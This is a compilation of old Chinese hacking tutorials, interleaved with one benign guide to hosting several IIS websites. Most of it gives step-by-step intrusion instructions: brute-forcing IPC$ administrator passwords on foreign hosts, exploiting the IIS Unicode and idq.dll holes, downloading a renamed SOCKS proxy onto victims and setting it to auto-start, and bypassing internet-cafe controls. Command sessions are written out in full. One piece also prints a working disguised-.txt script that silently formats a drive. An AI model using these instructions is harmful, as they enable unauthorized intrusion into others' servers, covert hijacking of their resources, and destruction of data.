$RUNNING_ON_SSL_SERVER= 0 ; 改成 $RUNNING_ON_SSL_SERVER= 1 ;
保存，然后按提示（建议是默认设置）完成。

6、设置CGIProxy

在C:\Inetpub\wwwroot 下创建cgi-bin目录。将nph-proxy.cgi拷到该目录下。

双击“我的电脑|控制面板|管理工具|Internet 信息服务”。在“默认 Web 站点”选中已创建cgi-bin目录，点击右键“属性|目录|执行许可”切换为“纯脚本”。建议这个cgi-bin目录只容许SSL访问，操作：在“默认 Web 站点”选中“cgi-bin目录”，点击右键，“属性|目录安全性”的“安全通信”的“编辑”，选中“申请安全通道（SSL）”，“确定”。
这样就完成了CGIProxy的设置。

7、使用
一切完成后（全部过程都不需重起系统），基于Web的安全匿名代理服务器就出来了。但这样的服务器在安全方面还需要加强，以免被入侵。现在可以访问自己的https://127.0.0.1/cgi-bin/nph-proxy.cgi/试一试，有问题可能是上面步骤没有设置好，需要检查和调试。

欢迎补充修正。

2002-01-19


完全跳板安装手册!
作者：特种兵

好久没有给大家公布跳板，大家对我还是很不错！有不少朋友也常常问我究竟要如何安装跳板呢？用unicode漏洞安装的跳板权限太低了，现在又流行病毒，有unicode漏洞的肉鸡也是越来越不好找了，所以我把我安装跳板的过程写出来供大家分享，也希望大家都能学会这个方法，这样大家就不用老缠着别人等着公布跳板了，也不用等急了还要骂人！！
    首先的准备工作有，检查你的机器是否为2000/NT/XP，否则你不能用这个方法完全安装跳板！如果你还在用98/ME，赶快升级吧！2.检查你下载的跳板压缩包里是否有SkSockServer.exe，没有可以到http://extend.hk.hi.cn/~dzc/pm/sksockserver.zip下载，把它改名为asd.exe，当然是为了掩人耳目，你随便改了！3.流光四，小榕哥的好东东，菜鸟级黑客杀人越货必备之良品，可以在http://www.netxeyes.com/fluxay4/fluxay4setup.exe下载！4.IP地址表（呵呵，这个东东是搞代理必备的东东，可以从追捕里提出来，如果你没有，就用我的吧http://person.longcity.net/home2/tezhongb/hex.zip下载！
    呵呵！有了上面的东东，就开工吧！打开流光四！Ctri-A，在地址栏里填上你从IP地址表里找到的IP端，一般是选国外的，最好是台湾和日本的，略表一下爱国心嘛！在底下的选项里就保留IPC一个就够了，其它的全部去掉，呵呵，就这个漏洞好用！然后在点击上面〔设置〕边上的[IPC]选项，选中[仅对Administrator组进行猜解]，呵呵！怎么样，没出10分钟，我就找到了十多个密码简单的肉鸡！本文假设你已经获得了111.111.111.111这台win2000服务器的管理员帐号，用户名为 test ，密码为 hello ！提示：以下操作必须在winnt或win2000下面执行！并且要已经连到因特网，从 //开始是不用输入的，只是表示注释！本文假设你将srv.exe和asd.exe文件copy到c:\的根目录下面。
    在开始的运行菜单键入 cmd ，进入了命令控制符界面。
ping 111.111.111.111 //查看网络是否畅通，只有出现类似于 Reply from 202.96.128.68: bytes=32 time=189ms TTL=242的回答表示网络畅通，可以执行下一步。

net use \\111.111.111.111\ipc$ "hello" /user:"test" //如果成功会出现命令成功完成的提示，不成功则stop，检查你的密码和用户名是否正确。

copy c:\asd.exe \\111.111.111.111\admin$\system32\ //将跳板文件上传到远程主机，大概一两分钟就可以了。

copy c:\srv.exe \\111.111.111.111\admin$\system32\ //将文件上传到远程主机，这个东东是用来打开肉鸡99端口的！在你的流光的目录底下的tools文件夹里能找到它！
    然后点击流光上你找到的肉鸡，连接，呵呵，进入到NTCMD的界面，直接键入srv.exe,连接成功后返回到cmd底下，键入telnet 111.111.111.111 99
    呵呵，看到什么？
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
C:\WINNT\system32>asd -install
Snake SockProxy Service installed.　　　　　　 （安装跳板）

C:\WINNT\system32>
C:\WINNT\system32>asd -config starttype 2
The New StartType have set to 2 -- Auto　　 （使跳板自动运行，不怕肉鸡在重启了）

C:\WINNT\system32>
C:\WINNT\system32>asd -config port 5262 （让跳板工作在5262端口，你可以自己设定）
The Port value have set to 5262

C:\WINNT\system32>
C:\WINNT\system32>net start skserver
The Snake SockProxy Service service is starting.
The Snake SockProxy Service service was started successfully. （跳板安装成功）

C:\WINNT\system32>
C:\WINNT\system32>

    我们现在来验证跳板是否真正运行。运行代理猎手，添加结果，将上面那台主机的 IP 加上去，端口是 5262 （就是我爱菱儿啦！），协议是 socks5 。验证它的结果是 free 。OK!一个完全安装的跳板就做成了！


提升unicode权限，安装代理跳板

    大家早就拜读过nicky写的《利用 unicode 漏洞，轻松建立自己的代理服务器》，但通过unicode漏洞的到的代理跳板权限太低，肉鸡一重启，跳板就不能用了：－（，所以我们就的想办法提高自己在肉鸡上的权限，来正确安装跳板。这样只要管理员没有发现，你就可以永远的使用这些跳板了！废话少说，看我怎么做！
    我们怎样提高自己在肉鸡上的权限呢？我在网上找到这么个好东东！奉献给大家！
    下载地址http://www.harbindeer.com/substorm/othersoft/iissystem.zip
    首先，我们还是按照nicky的方法把SkSockServer.exe (改名为asd.exe）和刚才下载的压缩包里的idq.dll（要把他上传到一个可执行目录.文件名必须是一下其中的一个.
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll
    传到肉鸡上，idq.dll必须上传至IIS的一个可执行目录中，例如/scripts，然后使用ispc.exe进行连接！当然也有好多其它办法，不过这个比较安全，不包漏自己的IP！记的把asd.exe拷贝到C:\WINNT\system32下！在2000的在开始的运行菜单键入 cmd ，进入了命令控制符界面！然后使用ispc.exe进行连接：
C:\>ispc ***.***.***.***/scripts/idq.dll（根据自己的实际情况进行更改）
连接成功以后就可以得到一个shell了.不用再担心权限的问题了...不过这个程序的回显好像有些问题..没关系.小意思!!
下面是我的连接过程.由于回显的问题很乱的.对付着看吧~~~
C:\>ispc ***.***.***.***/scripts/idq.dll

Start to connect to the server...
We Got It!
Please Press Some to Enter Shell....

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.

C:\WINNT\system32>asd.exe －install

C:\WINNT\system32>

C:\WINNT\system32>
asd.exe -install
Snake SockProxy Service installed.

C:\WINNT\system32>asd.exe -config starttype

C:\WINNT\system32>

C:\WINNT\system32>asd.exe -config starttype
The New StartType have set to 2 -- Auto

C:\WINNT\system32>asd.exe -config port 1011

C:\WINNT\system32>

C:\WINNT\system32>
asd.exe -config port 1011
The Port value have set to 1011

C:\WINNT\system32>net start skserver

C:\WINNT\system32>

C:\WINNT\system32>
net start skserver
Snake SockProxy Service 服务正在启动 .
Snake SockProxy Service 服务已经启动成功。

C:\WINNT\system32>
C:\WINNT\system32>
C:\WINNT\system32>

这样一个可以启动的跳板就做好了！以后只要网管没发现，呵呵，你就可以用久的使用这个跳板了，肉鸡重启，跳板也自动重启！
付：由命令行设置/显示 当前 端口,启动方式,允许的客户ip连接,远程跳板设置.
c:> SkSockServer -config show === [显示所有配置]
c:> SkSockServer -config port === [显示/设置 端口]
c:> SkSockServer -config StartType === [显示/设置 服务启动方式]
c:> SkSockServer -config client [add/del] === [显示/增加/删除 客户端的项目]
c:> SkSockServer -config SkServer [add/del] === [显示/增加/删除 经过SkServer的项目]
其实这种提升权限的方法不光可以用在Unicode漏洞上..具体的就等着你自己去想吧~~.

提醒一句.不要用来做坏事!!~~ 做个跳板就可以了


txt文件欺骗及防范方法

    在众多媒体的宣传报道下，今天的我们都知道了不能轻易打开电子邮件里的可执行文件类的附件，但是显然那些破坏活动的制造者们也看了那些警告防范的文章，他们开始玩一些新的把戏，让您以为那些附件只不过是没有危险的文本文件或是图像文件等就是其手段之一。由于目前大多数人使用的是windows系列操作系统，windows的默认设置是隐藏已知文件扩展名的，而当你去点击那个看上去很友善的文件，那些破坏性的东西就跳出来了。您可能说这我早就知道了，那么下面讲述的.txt文件的新欺骗方法及原理您知道吗？

    假如您收到的邮件附件中有一个看起来是这样的文件：QQ靓号放送.txt，您是不是认为它肯定是纯文本文件？我要告诉您，不一定！它的实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来，您看到的就是个.txt文件，这个文件实际上等同于QQ靓号放送.txt.html。那么直接打开这个文件为什么有危险呢？请看如果这个文件的内容如下：
< script>
      a=new ActiveXObject("WSCript.Shell");
      a.run("format.com d:/q /autotest /u");
      alert("Windows is configuring the system. Plase do not interrupt this process.");
  < /script>
    您可能以为它会调用记事本来运行，可是如果您双击它，结果它却调用了HTML来运行，并且自动在后台开始格式化d盘，同时显示“Windows is configuring the system。Plase do not interrupt this process。”这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧？

    欺骗实现原理：当您双击这个伪装起来的.txt时候，由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}，也就是.html文件，于是就会以html文件的形式运行，这是它能运行起来的先决条件。

    文件内容中的第2和第3行是它能够产生破坏作用的关键所在。其中第3行是破坏行动的执行者，在其中可以加载带有破坏性质的命令。那么第2行又是干什么的呢？您可能已经注意到了第2行里的“WSCript”，对！就是它导演了全幕，它是实际行动总指挥。

    WScript全称Windows Scripting Host，它是Win98新加进的功能, 是一种批次语言/自动执行工具——它所对应的程序“WScript.exe”是一个脚本语言解释器，位于c:\WINDOWS下，正是它使得脚本可以被执行，就象执行批处理一样。在Windows Scripting Host脚本环境里，预定义了一些对象，通过它自带的几个内置对象，可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。

    下面我们通过一个小例子来说明Windows Scripting Host功能是如何的强大，使用又是怎样的简单，被有心人利用后的威胁有多大。例如有内容如下的*.vbs文件：

    Set so=CreateObject("Scripting.FileSystemObject")
    so.GetFile(c:\windows\winipcfg.exe).Copy("e:\winipcfg.exe")

    就是这么两行就可以拷贝文件到指定地点。第一行是创建一个文件系统对象，第二行前面是打开这个脚本文件，c:\windows\winipcfg.exe指明是这个程序本身，是一个完整的路径文件名。GetFile函数获得这个文件，Copy函数将这个文件复制到e盘根目录下。这也是大多数利用VBscript编写的病毒的一个特点。从这里可以看出，禁止了FileSystemObject这个对象就可以很有效的控制这种病毒的传播。用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。

    欺骗识别及防范方法：这种带有欺骗性质的.txt文件显示出来的并不是文本文件的图标，它显示的是未定义文件类型的标志，这是区分它与正常.txt文件的最好方法。识别的另一个办法是在“按WEB页方式”查看时在“我的电脑”左面会显示出其文件名全称，此时可以看到它不是真正的txt文件。问题是很多初学者经验不够，老手也可能因为没留意而打开它，在这里再次提醒您，注意您收到的邮件中附件的文件名，不仅要看显示出来的扩展名，还要注意其实际显示的图标是什么。对于附件中别人发来的看起来是.txt的文件，可以将它下载后用鼠标右键选择“用记事本打开”，这样看会很安全。

    好了，现在您知道.txt文件也不能轻易打开了吧？您知道了？OK，我写这篇文章的目的达到了！


利用unicode漏洞，轻松建立自己的代理服务器

    snake的sksockserver（代理跳板）是一个非常好的的 socks5 代理服务器。它非常小巧，才32K，但是可以比较完整的支持tcp协议和udp协议，也支持oicq，而且它具有将通信数据在各跳板之间加密的功能。这使我们能很好的掩盖自己网上踪迹。实乃行走江湖，杀人越货必备工具： -) 。不过，使用它需要一定的服务器入侵知识，这对新手菜鸟是个很大的挑战。因此，我写下这篇文章，希望对大家有所帮助。

所需软件： 流光4 http://www.netxeyes.com/
代理跳板SkSockServer http://snake12.top263.net
代理猎手 http://dzc.126.com/

准备工作：请申请一个 ftp 空间，现在的免费主页大都带有 ftp 空间的。假设申请的 ftp 空间地址为 ftp.server.com ，用户名为 tom ，密码是 pass 。将 SkSockServer.exe 改名为 char.exe 上传到 ftp 空间。改名的目的当然是为了不那么起眼，你随便改好了。

步骤： 一：在 C 盘根目录下面建立一个文本文件 pp.txt，内容如下：

echo open ftp.server.com>af.txt
echo tom>>af.txt
echo pass>>af.txt
echo bin>>af.txt
echo get char.exe>>af.txt
echo bye>>af.txt
ftp -s:af.txt
del a.txt
del af.txt
char -debug 5262

注意了，请用你的真实的 ftp 网站地址、用户名、密码代替上面的 ftp.server.com 、 tom 和 pass ，否则就不会成功的。现在来检查你的文件是否正确，复制一份 pp.txt ，将它的扩展名改为 bat ，即将文件改名为 pp.bat 。拨号上网，执行 pp.bat ，如果你没有写错，那在 pp.bat 所在目录下面应该会有一个 char.exe 。如果 char.exe 文件不在，检查你的网络连接是否正常，自己用 ftp 软件去看看自己的空间里面是否有 char.exe 这个文件。最重要的要检查 ftp 服务器有没有写错，用户名和密码是否正确。

我来解释一下这个文件的意思.如果你学过 dos ，就会很清楚上面pp.txt文件的作用了。
echo 命令是在屏幕上显示你输入的字符。如，在 dos 下面，输入
echo hello
那它就会显示
hello
“ > ”是管道重定向符号，执行 dos 命令
echo hello>a.txt
命令执行的结果是将 hello 写在一个 a.txt 文件上， 原先a.txt 文件的内容会被删掉，变成只有 hello 这个单词。如果 a.txt 文件不存在，那它会自己生成一个新文件。 “ >>" 和 ">" 不同的地方是它不会删掉文件原有的内容，只会在文件后面追加新内容。
好了，我们来看 pp.txt 文件执行的结果

echo open ftp.server.com>af.txt echo tom>>af.txt echo pass>>af.txt echo bin>>af.txt echo get char.exe>>af.txt echo bye>>af.txt

上面这几个命令执行的结果是在当前路径下生成一个 af.txt 文件，内容如下：
open ftp.server.com
tom
pass
bin
get char.exe
bye

然后是执行 ftp af.txt
这让系统调用 ftp 命令，下载 char.exe 文件。
下面的就没有什么好说了
分别是删除 a.txt ， af.txt 文件，在 5262 端口上进行 socks5 服务。

二：打开流光 4, 按 Ctrl+R ，在弹出的对话框中，填写你想搜索的 IP 范围，建议搜索台湾、美国或者日本的网站，它们漏洞比较多。扫描主机类型改为 IIS/FrontPage, 这里我搜索 210.59.70.1 － 210.59.72.254 。搜索结束后会弹出提示的，这里我用了约 5 分钟时间。在流光中间一栏会出现你搜索到的结果，分为主机、系统版本、类型、描述四项。如果主机是黑色的，也就是在类型那一栏里写着 Remote Excute X ，（ X 是从 A 到 E 之间的字母，）那这台主机就是有 unicode 漏洞了。点击它，选连接，将允许 IIS 检测 CMD 去掉，然后我们就可以执行命令了。

三：先输入一个命令，看看它是否允许我们写入文件。我们输入
echo hello>a.txt
这时，可能出现几种提示：
A. 如果文件允许写入，就只会显示
[echo hello>a.txt]
那这台服务器就可以作为我们的跳板了。
B. 服务器不允许输入，那么会显示
[echo hello>a.txt]
Access is denied.
这表示这台服务器不允许我们写入文件，呵呵，去找下一台吧，这台没戏了。
C. 使用了陷阱技术
[echo hello>a.txt]
HTTP/1.1 502 Gateway Error
那可能是主机做了一定的防范措施，你可以再重新试试刚才那个命令，也许行的。
D. 其它
我也不知道原因了。试试直接执行下面步骤吧，也许会成功。
好了，出现 A 的情况，那表示这台主机可以作为跳板了。再输入
local file:c:\pp.txt
这个命令就是让流光依次执行 c:\pp.txt 里面的指令，免除我们一个个输入的麻烦。它的输出大致如下：
[local file:c:\pp.txt]
[echo open ftp.server.com>af.txt]
[echo tom>>af.txt]
[echo pass>>af.txt]
[echo bin>>af.txt]
[echo get char.exe>>af.txt]
[echo bye>>af.txt]
[ftp -s:af.txt]
[del af.txt]
[char -debug 5262]

在有些机器上执行的输出有些差异，但基本上是这样的。如果在其中的某一个命令出现了“ HTTP/1.1 502 Gateway Error ” ，那你就要重新执行
local file:c:\pp.txt
如果出现 Connect Failed ，那可能是你的网络连接有问题，检查一下是不是掉线了，再重新执行
local file:c:\pp.txt

四： 我们现在来验证跳板是否真正运行。运行代理猎手，添加结果，将上面那台主机的 IP 加上去，端口是 5262 （就是我爱菱儿啦！），协议是 socks5 。验证它的结果是否 free 。如果是就行了。不是重新执行一次 local file:c:\pp.txt 吧。再不行只好放弃了，另外找一台机器好了。关掉 IIS 远程命令行，再选择另外一台有 unicode 漏洞的机器重复步骤三，这样就可以将所有搜索到的 unicode 漏洞机器作为你的跳板了。

五： 运行 skserver 图形版本，选配置－经过的 skserver ，将刚才弄好的一两个跳板加上去。在这里不要加太多的跳板，否则会影响你的浏览速度，如果没有特殊需要，一个就可以了。按 ok 后在命令里面选择停止，再选择开始，你现在就拥有了一个加密的 socks5 代理。可以用 sockscap 或者 nec e-border client 等 socks 接口软件来调度你的网络程序，呵呵，现在就尽情的冲浪吧。

注意事项： 因为利用 unicode 漏洞得到的权限很低，所以不能让 sksockserver 作为服务运行，也就不能让它每次开机自动运行了。如果它停了你可以很方便的再次运行它。和建立时候一样，打开 IIS 命令行，然后运行这个命令就可以了
char -debug 5262
如果你有任何的疑问，请来信一起探讨。

致谢：非常感激 snake 的代理跳板，它让我可以穿过学校的封锁，尽情的冲浪和与我的菱儿聊天。也谢谢小榕，它的流光是我见过最强大而简单的黑客软件。当然了，我更加不会忘记太阳风，他的代理猎手是带领我走进网络之门的程序。

作者： Nicky
email ：liuxua@163.net


“网吧管理专家”密码破解
作者：清逸子

“网吧管理专家”密码破解
    现在的网吧几乎全部都是安装"网吧管理专家"来进行对网吧的管理。网吧管理员以设置密码的方式来防止别人任意修改、访问等操作，由于"网吧管理专家"设置密码的项目众多，难免会忘记其中一组或几组的密码，忘记密码该怎么办呢？

    若是不能退出"网吧管理专家"客户端程序，请您重启计算机以安全模式启动Windows，再按照如下所述操作；若是能退出"网吧管理专家"客户端程序，回到Windows操作界面，就可以如下操作：
    首先，在 开始 -> 运行 ->
输入Regedit.exe（进行对Windows注册表编辑），看看是否把Regedit.exe 禁用，若是禁用，请用超级兔子魔法设置 （MagicSet Ver 3.3/3.4）把禁用更改为允许使用。具体操作：超级兔子魔法设置
-> 安全与其它 ->
（取消）禁止使用注册表编辑器REGEDIT.EXE ->
保存，这时重新运行Regedit.exe就能正常使用了。

    然后，找到"网吧管理专家"所写注册表的位置。具体位置：[HKEY_LOCAL_MACHINE\SOFTWARE\万象幻境\专家系列网管软件]

    当进入到上述位置，您会看到右边窗口有如下信息：

    计算机解锁密码、运行设置程序密码、历史记录密码、退出密码、DownloadPassword、VisitDiskPassword等字符串值，跟随其后的一长串数字就是"网吧管理专家"设置各项功能的密码（密码已被编译），您想清除哪项功能的密码，就找到相应的字符串值将其删除就行了。

    计算机解锁密码："网吧管理专家"对电脑进行解锁所需要的密码。

    运行设置程序密码：运行"网吧管理专家"设置程序所需要的密码。

    历史记录密码：查看"网吧管理专家"历史记录所需要的密码。

    退出密码：退出"网吧管理专家"客户程序所需要的密码。

    DownloadPassword：将下载的软件保存到本地硬盘时所需要的密码。

    VisitDiskPassword：进行Internet属性设置所需要的密码。

    其次（可选）：如果您觉得此方法只适合一台或二、三台客户机有效，对几十台，甚至上百台的客户机操作作起来就非常麻烦了，哪再讲述一种快速的方法。

    用每台客户机去访问服务器的"网吧管理专家"安装程序进行重新安装，在安装过程中，会在"选择安装客户机版/服务器版"和该软件安装路径之间，多出二行文字：
  * 系统检查到您曾经安装过这个软件，是否保留以前的系统设置？
  * 保留以前的系统设置

    将它设置为：（取消保留以前的系统设置），当安装完成后，以前"网吧管理专家"的参数设置全部被替换成了默认值。

    最后，重新设置"网吧管理专家"的各项密码就行了。

    上述的密码破解方法仅供网吧管理员应急和电脑爱好者学习用，请勿用于其它用途。


网吧上网敲破美萍安全卫士

网吧上网敲破美萍安全卫士

在大陆的一些网吧奉邪恶之命，安装了网管软件，对上网进行种种限制，如不能下载、不能看某些敏感内容，不能上敏感网站等。其实也没什么，我们通过一些简单的技巧，就可以铲除它。

我一开始也遇到这些问题，后来上网查了一些资料，找到了一些方法可以突破邪恶的封锁，经过实践也可行，不知在别的地区行不行，写出来给大家参考一下。

我所在的地方的网吧安装的大部份是美萍安全卫士。在网吧上网时，工作人员给发出一条命令，在上网的电脑上显示“你的机器在几点几分开通”，这样才能上网，在这之前就上不了。这条命令我估计和美萍没什么大关系，因为以后开机重启仍可以上网。

1、使用密码破解软件、

这个方法比较简单，有两种常用软件--美萍安全卫士密码探测器和美萍安全卫士密码破解器,用搜索引擎可以查到。现在可以在美萍安全卫士8.1以下的版本中使用。运行之后，可以得到美萍的系统密码，从而退出美萍。

这种方法主要难在找到相应的工具，新浪网的搜索引擎不错，以“美萍”“密码破解”、“黑客”等关键字查找，仔细找一下就能找到，第一次可能困难点，以后就轻车熟路了。有时不能下载或下载困难，直接打开运行就可以。这些文件一般是压缩文件，在这之前还要安装解压软件，也可以用搜索查到，如winzip,winrar等。

2、运行msconfig

这个方法主要难在运行上。因为美萍不让运行程序，我们可以采用下面的办法：随便打开一个网址,例如新浪的主页，页面的最下端有一个"联系方式"超级链接。点一下，会出来一些他们的Email地址，点这些地址，会跳出邮件编辑器OUTLOOK或是FOXMAIL。有什么用呢?选取加入附件,浏览选定msconfig（在windows的system目录下）,然后点一下它,就可以运行。

我们运行其他windows的程序，也可以通过这种方式。运行msconfig后，把“启动”一栏的东西可以全部去掉，重启机器，就可以不运行美萍了。

3.利用安全模式

    如果msconfig不能运行。重新启动计算机在"STARTING WINDOWS......"后按住F8键会出现启动菜单。进入安全模式，再运行msconfig。

还可以将美萍删掉或改变它的目录名称(SMENU目录)

4、利用DOS实模式

如果连安全模式里都有美萍?重新启动进入DOS实模式，DELTREE C:\SMENU或者是FORMAT C:/Q/U。


在一台计算机建立多个网站和相对应的FTP

利用家中电脑建立多个网站和FTP指南

假如你有一台宽频上网的计算机，想要利用它来为大家提供个人网站的服务，而且要建立不止一个的网站，还要求拥有每个站点的朋友可以通过FTP来上传他的文件而不会看到其他站点的内容，该如何实现呢？下面就请你一步一步跟我做－－July Snow所介绍的方法绝对是最简单的。

一、安装Internet信息服务

以Windows2000专业版为例，首先安装Internet信息工具，点击“开始－－设置－－控制面板－－添加/删除程序－－添加/删除windows组件”，在“windows组件向导”中选中“Internet信息服务”，下一步，确定。

安装完Internet信息服务在你的电脑上就有了一个默认的web网站，但我们要在电脑上建立不止一个网站，就要用到虚拟网站功能了。

二、安装虚拟网站

建立虚拟网站目录，我们把它建立在D盘（好处是系统出问题时不会把网站内容一起丢失），先建立一个名为www的文件夹，再在www文件夹里面建立网站目录，比如网站名叫zzz，那就建立名为zzz的文件夹(因为是虚拟网站，先建立www文件夹是为了安全，否则所有虚拟网站用户在FTP登陆后是可以看到默认FTP站点的文件的 ，这里要将www文件夹设为默认FTP站点的目录，里面不要放你的文件）。

下面把zzz用户名添加到计算机，打开控制面板的“用户名和密码”，选择“要使用本机，必须输入用户名和密码”，点击“添加……”按钮，用户名填zzz，下面两项随便填，下一步，输入这个用户所使用的密码，下一步，选择要给予他的权限，对FTP用户建议选择“其他”的Users，这是权限最低的用户组，以免被黑客利用来破坏。下一步，完成，zzz的用户名就出现在本机用户窗口中了。

打开控制面板的“管理工具－－Internet信息服务”，右键点击系统名称下面的“默认web站点”选“新建－－虚拟目录”，出现“虚拟目录创建向导”，下一步，在“别名”框中输入zzz，下一步，在目录框中输入D:\www\zzz，下一步，设置权限，一般默认就可以了。下一步，完成。在“默认web站点”下面出现了一个zzz的目录。

右键点击“默认web站点”下的zzz目录，选“属性－－文档－－添加，在“默认文档名”输入index.htm，确定，在依此方法添加上index.html（因为大多网站的默认最初文档是index）的文档名，调整文档名的上下次序可以决定让浏览者看到的默认页面是哪个。如果要让网站支持cgi等程序运行，在“虚拟目录－－应用程序设置－－配置”中进行设置，这里简单说一下对cgi的支持配置：首先 你的系统已经安装了ActivePerl，点击“应用程序设置”的“配置”，“应用程序映射－－添加”，“可执行文件”填“C:\Perl\bin\perl.exe %s %s”--如果ActivePerl的安装路径不是“C:\Perl\”请修改成相应的路径，“扩展名”填“.cgi”，其他默认。按确定退出。这样，名为zzz的网站就建立了。

三、安装SSL服务

如果你还想为大家提供SSL服务（否则就跳过安装SSL这部分），请先自己给自己颁发证书（前提你的系统必须是windows2000服务器或高级服务器版，且在安装Internet 信息服务时选择了“证书服务”这一项，当然其他版本也可以，但证书要在有关机构购买或访问安装有证书服务的其他计算机获得）。双击“控制面板－－管理工具－－Internet 信息服务”，“默认 Web 站点”点击右键，点击“目录安全性－－服务器证书”，“创建新证书”，然后按提示（建议是默认设置）完成，得到一个certreq.txt的文件。

确保启动了“Internet 信息服务（IIS）”，访问http://127.0.0.1/certsrv，选中“申请证书”，“下一步”，选中“高级申请”，“下一步”，选中“使用 base64 编码的 PKCS #10 文件提交一个证书申请，或使用 base64 编码的 PKCS #7 文件更新证书申请。”，“下一步”，按提示将certreq.txt文件内容贴到“Base64 编码证书申请(PKCS #10 或 #7): ”的空白处，然后“提交”。这样就完成了证书申请。

双击“控制面板－－管理工具－－证书颁发机构”，选中“待定申请”，可以看到刚才的“申请证书”，选中“申请证书”，点击右键“所有任务－－颁发”。选中“颁发的申请”，选中刚才颁发的证书，点击右键“所有任务 －－打开－－详细信息－－复制到文件”，然后按提示（建议是默认设置）完成，得到一个xxx.cer的文件，即得到自己给自己颁发的证书。

回到“Internet 信息服务”的“默认 Web 站点－－目录安全性－－服务器证书”，按提示把刚才得到的xxx.cer的文件安装进去。这样SSL就完成了。

右键点击“默认Web站点”下面的zzz目录，选“属性－－虚拟目录－－执行许可”切换为“纯脚本”。“目录安全性”的“安全通信”的“编辑”，选中“申请安全通道（SSL）”，确定，这个zzz的网站就具备了SSL功能。

四、安装和虚拟网站配套的虚拟FTP站点

下面我们再为这个虚拟网站建立用来上传网页的FTP站点，右键点击“Internet信息服务”窗口中的“默认FTP站点”，选“新建－－虚拟目录”，出现“虚拟目录创建向导”，下一步，在“别名”框中输入zzz，下一步，在目录框中输入D:\www\zzz，下一步，设置权限，选取“读取”和“写入”。下一步，完成。在“默认web站点”下面就出现了一个zzz的目录。

五、调试所安装的服务

至此，这个名为zzz的虚拟网站所有的配置完成。zzz的用户在上传文件时，ftp主机地址就是你的上网IP地址，用户名是zzz，密码是你在控制面板的“用户名和密码”中为他设定的密码。 在CuteFTP等登陆工具中以用户名zzz主机127.0.0.1来访问一下。127.0.0.1是本机地址，如果你在网上，也可以用你现在的IP替换掉127.0.0.1，如果在本机可以登陆的话，这个FTP站点就可以在远端登陆，效果是一样的。至于zzz的域名格式，默认的话就是http://你的IP地址/zzz，如果zzz的文件夹里面有网页文件，你现在可以访问http://127.0.0.1/zzz来访问一下。

看起来好像挺复杂，其实只要掌握了方法还是很容易的。再依此方法建立并设置其他的虚拟网站 和相对应的FTP站点，一般ADSL上网，建立5、6个虚拟网站，，只要网站访问量不太大和没有运行特别消耗资源的程序，如聊天室等等，还是可以对付的。

六、动态域名

我们多是动态ip，每次上网ip地址都会发生改变，难道我们每次上网还要一一通知所有的朋友你的IP吗？办法有的是，最方便的是动态域名方案。所谓动态域名，就是当有人打开这个网址时，域名解析系统就会把它指向你目前的IP。

介绍一个提供动态域名服务的站点：http://www.dyndns.org。要使用此站点提供的免费域名服务，首先要求用户注册，成为该站的 NIC 成员，只有成为其会员，才可享受免费动态域名服务。注册时，要求用户提供E-mail地址，得到认可后，该网站会给用户发一封电子邮件，其中包含了一个用户登录的口令。以此口令登录后，就可以自由注册你的计算机的FQDN了，其域名形式为：yourPC.dyndns.org，当然你也可以选择另外几个域，并且可以注册多台计算机。这个站点支持SSL域名。

剩下的工作就是将拨号上网计算机的IP地址提交给动态域名服务器了。手工提交不是一个明智之举，该站的Client链接下提供了几个小软件，它们可以帮你自动提交。此外，这个站点同时提供静态域名服务，为那些拥有固定IP地址，但没有自己的域名的计算机提供免费的域名解析服务。

再给大家介绍几个自动提交本地IP地址的工具：

IP-Post：可以从http://www.gracemere.com下载，这是一个自由软件，用Visual Basic编写。

Auto-IP Publiser：可以从http://www.lakefield.net/~smiller/autoip下载。它可以自动提交IP地址，可惜它不是个免费软件。

时空动态域名：是个中文免费软件，下载网址是：www.csdn.net。它可以将你现有的转向域名在每次开机上网时自动指向你的电脑，支持如网易（126.com），是呀是呀（4y4y.net）等国内外60多个免费域名。

最后再告诉大家一个小经验，因为不可能长期开机在线，如何在互联网的其他网站或论坛设置一个可以显示你电脑中这些网站的在线状态呢？别人在访问其他网站时可以通过这个在线状态显示来得知你的网站是否开通。还是以zzz这个站点来举例，只要先在zzz的文件夹（对zzz这个用户来说就要从远端登陆FTP了）里面放一个名为zt.gif的图片，大小自己定，不要过大，象网站LOGO那样最好，然后在要显示状态的网站的网页中加入如下代码：

<a href="http://动态域名/zzz">
<img border="0" src="http://动态域名/zzz/zt.gif" width="133" height="39" alt="我的动态网站，图片显示时点击即可访问！"></a>

当不在线时在网页中显示是这样的： 动态网站，图片显示时点击即可访问 在线时则显示为在zzz文件夹的zt.gif图片，点击图片就会连接到zzz的网站。

那个width="133" height="39"是图片要显示的宽和高，你根据需要自己更改。“动态域名”几个字要替换成所申请的动态域名地址。

后记

以上就是家中架设多个网站的简单步骤，简单吧？当然这样的设置还不够安全，但由于只向少数好朋友开放，问题也不大。 你如果愿意的话，可以有许多种安装选择，但这种是最简单的，不用再另外安装软件。就到此为止，有什么疑问欢迎来信探讨，我的信箱是……哦，还是不公布为好，我实在太忙了，有问题就到思高维论坛去提吧 ，那有好多高手呢！

难免有误，欢迎修正。4月11日


在肉鸡上安装ftp服务器
作者：nicky
在肉鸡上安装ftp服务器

我们在入侵别人机器时候，经常需要一个ftp服务器。去申请的主页空间附带的ftp服务器常常有各种限制，而且，不小心就会暴露了自己的身份。因此，建立一个自己专用的ftp服务器，是很有用的。经过我一阵疯狂搜索，终于找到了slimftp这个好东东，首先，它身材小巧，而且不需要安装，在console下就可以运行，绝对不会弹出窗口，提供了标准的上传、下载功能，而且可以更改服务端口、设置用户权限等。关于slimftp的功能，请参考它的说明文档。

在这里，我假定大家已经获得了一个管理员或者系统权限的shell，这是安装它必需的权限。

安装步骤：安装步骤分为本地设置和服务器设置。

